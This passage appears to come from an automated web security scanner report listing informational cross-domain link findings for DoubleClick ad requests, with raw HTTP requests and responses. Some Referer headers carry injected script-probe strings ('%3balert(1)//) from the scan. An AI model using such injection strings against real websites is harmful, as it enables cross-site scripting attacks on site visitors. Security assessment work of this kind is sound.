GET /adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 659
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 01:54:42 GMT
Expires: Sat, 29 Jan 2011 01:54:42 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/4/72/%2a/r
...[SNIP]...
824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=http://www.potterybarnkids.com/shop/sale/accessories-sale/?page=viewall?bnrid=3518504&cm_ven=targeteddisplay&cm_cat=yahoodisplay&cm_pla=Logo&cm_ite=All"><img src="http://s0.2mdn.net/viewad/2388325/PBK_300x250_GearSale_WD111.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

17.53. http://ad.doubleclick.net/adi/N4682.132309.BURSTMEDIA/B4421704.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2388325/PBK_300x250_StartFresh_Baby_WD111.jpg

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 22:47:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 626

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9d/4/72/%2a/u
...[SNIP]...
s/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=http://www.potterybarnkids.com/?bnrid=3518504&cm_ven=targeteddisplay&cm_cat=yahoodisplay&cm_pla=Logo&cm_ite=All"><img src="http://s0.2mdn.net/viewad/2388325/PBK_300x250_StartFresh_Baby_WD111.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

17.54. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.152304.TRADEDESK/B5157804.4

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4;sz=728x90;ord=7045426855259476565?;click=http://r.turn.com/r/tpclick/id/VRK9hmVixmGm1AAAcwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;

The response contains the following links to other domains:

http://s0.2mdn.net/2309962/_Laserjet_TIAS_700_728x90_jpg.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N5823.152304.TRADEDESK/B5157804.4;sz=728x90;ord=7045426855259476565?;click=http://r.turn.com/r/tpclick/id/VRK9hmVixmGm1AAAcwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 23:04:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4492

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
D/url/http%3a%2f%2fwww.hp.com/united-states/tradein/promo/laserjet3/index.html%3Fmcc%3DGCJJ%26jumpid%3Dex_r2612_link/1Q11TIAS/1-ADGIO_mcc|GCJJ/dm%3A_N5823.152304.TRADEDESK_58826029_234985230_40268782"><img src="http://s0.2mdn.net/2309962/_Laserjet_TIAS_700_728x90_jpg.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.55. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.152304.TRADEDESK/B5157804.5

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5;sz=300x250;ord=4434400651657365963?;click=http://r.turn.com/r/tpclick/id/y0nM8eUnij0zGgUAaQABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;

The response contains the following links to other domains:

http://s0.2mdn.net/2309962/2-_Laserjet_TIAS_700_300x250_jpg.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N5823.152304.TRADEDESK/B5157804.5;sz=300x250;ord=4434400651657365963?;click=http://r.turn.com/r/tpclick/id/y0nM8eUnij0zGgUAaQABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 01:03:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
D/url/http%3a%2f%2fwww.hp.com/united-states/tradein/promo/laserjet3/index.html%3Fmcc%3DGCJJ%26jumpid%3Dex_r2612_link/1Q11TIAS/1-ADGIO_mcc|GCJJ/dm%3A_N5823.152304.TRADEDESK_58826031_234985033_40268645"><img src="http://s0.2mdn.net/2309962/2-_Laserjet_TIAS_700_300x250_jpg.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.56. http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5956.Advertising.com/B3941858.17

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000778478/cstr=67706747=_4d436c28,4382457826,766161^778478^1183^0,1_/xsxdata=$xsxdata/bnum=67706747/optn=64?trg=;ord=4382457826?

The response contains the following links to other domains:

http://s0.2mdn.net/2450389/capella_program_listings_728x90.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6735
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:19:53 GMT
Expires: Sat, 29 Jan 2011 05:19:53 GMT
Connection: close

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
click/site=0000766161/mnum=0000778478/cstr=67706747=_4d436c28,4382457826,766161^778478^1183^0,1_/xsxdata=$xsxdata/bnum=67706747/optn=64?trg=http%3a%2f%2fcapellalearning.net/default.aspx%3Fv%3Dunilong"><img src="http://s0.2mdn.net/2450389/capella_program_listings_728x90.gif" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.57. http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5956.Advertising.com/B3941858.17

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000778478/cstr=67706747=_4d436c28,4382457826,766161%5E778478%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=67706747/optn=64?trg=;ord=4382457826?

The response contains the following links to other domains:

http://s0.2mdn.net/2450389/capella_prebrand_cost_finance_v3_728x90.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N5956.Advertising.com/B3941858.17;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000778478/cstr=67706747=_4d436c28,4382457826,766161%5E778478%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=67706747/optn=64?trg=;ord=4382457826? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 01:23:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6488

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
=0000778478/cstr=67706747=_4d436c28,4382457826,766161%5E778478%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=67706747/optn=64?trg=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D146143%26banv%3D3_728"><img src="http://s0.2mdn.net/2450389/capella_prebrand_cost_finance_v3_728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.58. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3175.272756.AOL-ADVERTISING2/B4640114.3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.3;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000884204/cstr=40264137=_4d4372e7,8877258277,766159%5E884204%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=40264137/optn=64?trg=;ord=8877258277?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2769103/Frame_Rev_300x250.gif

Request

GET /adj/N3175.272756.AOL-ADVERTISING2/B4640114.3;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000884204/cstr=40264137=_4d4372e7,8877258277,766159%5E884204%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=40264137/optn=64?trg=;ord=8877258277? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 29 Jan 2011 01:52:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 556

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/c/b4/%2a/b;226750510;0-0;0;50154167;4307-300/250;39921274/39939061/1;;~sscs=%3fhttp://r1-ads.ace.advertising.com/clic
...[SNIP]...
4372e7,8877258277,766159%5E884204%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=40264137/optn=64?trg=http%3a%2f%2fwww.truecredit.com/%3Fenurl%3Dtruecredit.com%26am%3D2063%26channel%3Dpaid%26cid%3Ddisplay%3Aaol"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_300x250.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

17.59. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3175.272756.AOL-ADVERTISING2/B4640114.3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.3;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000884204/cstr=98287644=_4d4373e1,2465371404,766159%5E884204%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=98287644/optn=64?trg=;ord=2465371404?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2769103/Surprise_300x250_Free2011Score.gif

Request

GET /adj/N3175.272756.AOL-ADVERTISING2/B4640114.3;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000884204/cstr=98287644=_4d4373e1,2465371404,766159%5E884204%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=98287644/optn=64?trg=;ord=2465371404? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 29 Jan 2011 01:56:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 569

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/c/b4/%2a/v;226750510;1-0;0;50154167;4307-300/250;39961082/39978869/1;;~sscs=%3fhttp://r1-ads.ace.advertising.com/clic
...[SNIP]...
4373e1,2465371404,766159%5E884204%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=98287644/optn=64?trg=http%3a%2f%2fwww.truecredit.com/%3Fenurl%3Dtruecredit.com%26am%3D2063%26channel%3Dpaid%26cid%3Ddisplay%3Aaol"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_300x250_Free2011Score.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

17.60. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000884206/cstr=49938577=_4d4373e0,5630318555,766161%5E884206%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=49938577/optn=64?trg=;ord=5630318555?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2769103/Frame_Rev_728x90.gif

Request

GET /adj/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000884206/cstr=49938577=_4d4373e0,5630318555,766161%5E884206%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=49938577/optn=64?trg=;ord=5630318555? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 29 Jan 2011 01:56:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 554

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/c/b4/%2a/e;234024712;0-0;0;50154300;3454-728/90;39921263/39939050/1;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click
...[SNIP]...
4373e0,5630318555,766161%5E884206%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=49938577/optn=64?trg=http%3a%2f%2fwww.truecredit.com/%3Fenurl%3Dtruecredit.com%26am%3D2063%26channel%3Dpaid%26cid%3Ddisplay%3Aaol"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_728x90.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

17.61. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.19 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3340.trfu/B4677841.19

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N3340.trfu/B4677841.19;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/;ord=1114973045?

The response contains the following link to another domain:

http://s0.2mdn.net/1361550/PID_1507362_728.jpg

Request

GET /adj/N3340.trfu/B4677841.19;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/;ord=1114973045? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 33346
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:37:16 GMT
Expires: Fri, 28 Jan 2011 16:37:16 GMT
Discarded: true

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
5voK/http://pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=versa&dcp=zmm.50658498.&dcc=39942793.226884546"><IMG SRC="http://s0.2mdn.net/1361550/PID_1507362_728.jpg" width="728" height="90" BORDER=0 alt=""></A>
...[SNIP]...

17.62. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.19 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3340.trfu/B4677841.19

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N3340.trfu/B4677841.19;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/;ord=1114973045?

The response contains the following link to another domain:

http://s0.2mdn.net/1361550/PID_1507368_cashbackapr_728.jpg

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 14:48:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 33401

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
//pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=39942763.226884546"><IMG SRC="http://s0.2mdn.net/1361550/PID_1507368_cashbackapr_728.jpg" width="728" height="90" BORDER=0 alt=""></A>
...[SNIP]...

17.63. http://ad.doubleclick.net/adj/N3340.trfu/B4938104.54 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3340.trfu/B4938104.54

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N3340.trfu/B4938104.54;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/;ord=1186321869?

The response contains the following link to another domain:

http://s0.2mdn.net/1361549/PID_1464534_K1837_NMRO_CLS_728.jpg

Request

GET /adj/N3340.trfu/B4938104.54;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/;ord=1186321869? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 33314
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 28 Jan 2011 17:23:44 GMT
Expires: Fri, 28 Jan 2011 17:23:44 GMT
Discarded: true

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http://pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://www.nissanusa.com/rogue?dcp=omd.55865628.&dcc=39347977.232434380&dcn=1"><IMG SRC="http://s0.2mdn.net/1361549/PID_1464534_K1837_NMRO_CLS_728.jpg" width="728" height="90" BORDER=0 alt=""></A>
...[SNIP]...

17.64. http://ad.doubleclick.net/adj/N3340.trfu/B4938104.54 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3340.trfu/B4938104.54

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N3340.trfu/B4938104.54;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/;ord=1186321869?

The response contains the following link to another domain:

http://s0.2mdn.net/1361549/PID_1517494_math_728.jpg

Request

GET /adj/N3340.trfu/B4938104.54;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/;ord=1186321869? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
